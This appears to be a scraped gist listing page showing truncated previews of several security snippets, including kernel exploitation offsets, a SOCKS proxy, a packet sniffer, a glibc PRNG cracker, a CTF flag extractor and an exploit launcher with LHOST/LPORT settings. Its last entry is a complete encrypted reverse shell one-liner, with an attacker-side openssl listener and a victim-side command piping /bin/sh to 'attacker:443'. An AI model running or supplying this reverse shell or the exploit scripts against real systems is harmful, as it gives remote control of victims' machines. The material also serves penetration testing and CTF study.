This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import gdb | |
import re | |
from collections import namedtuple | |
DETAILS = { | |
# API 24 playstore | |
# API 25 playstore | |
'3.10.0+': (0xC0887D20, 0xC092138C, 316, 0xC0A7754C, 4), | |
# API 26 playstore |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import logging | |
import select | |
import socket | |
import struct | |
from socketserver import ThreadingMixIn, TCPServer, StreamRequestHandler | |
logging.basicConfig(level=logging.DEBUG) | |
SOCKS_VERSION = 5 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
''' | |
It has been tested with either py2 or py3. | |
Beware ancient versions of Linux kernel which may not support SOCK_NONBLOCK | |
or the memory mapped ring buffer. | |
BPF filter listed below is compiled form of "not port 22" | |
if you want to change it, do something like |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import z3 | |
import sys | |
# glibc default PRNG | |
# it is called TYPE_3, and is an additive recursive generator | |
# its internal state is made of 31 32-bits integers | |
# r_0 ... r_30 | |
# each call to random will modify the internal state |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import os | |
import re | |
import zipfile | |
from cStringIO import StringIO | |
def process_file(f): | |
data = f.read() | |
for m in re.finditer(r'(FLAG[0-9a-zA-Z/+=]+)', data): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import requests | |
import sys | |
from base64 import b64encode | |
LHOST = '172.16.89.1' | |
LPORT = 8888 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys | |
import json | |
start_time = None | |
for line in sys.stdin.readlines(): | |
o = json.loads(line) | |
if type(o) != type([]): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from selenium import webdriver | |
import selenium | |
import sys | |
import re | |
def take_screenshot(url, png): | |
options = webdriver.ChromeOptions() | |
options.add_argument('headless') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from cStringIO import StringIO | |
from struct import pack | |
from binascii import unhexlify, hexlify | |
from itertools import count, dropwhile | |
VERBOSE = True | |
class Asn1Obj: | |
'''generic frame for ASN1 fields, supports nesting''' | |
def __init__(self, klass, constructed, type, indefinite, value=None, children=[], absorbed=None): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# attacker side: create auto-signed certificate and setup a listener | |
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes | |
openssl s_server -quiet -key key.pem -cert cert.pem -port 443 | |
# victim side: connect back to attacker using TLS | |
mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect attacker:443 > fifo; rm fifo |
NewerOlder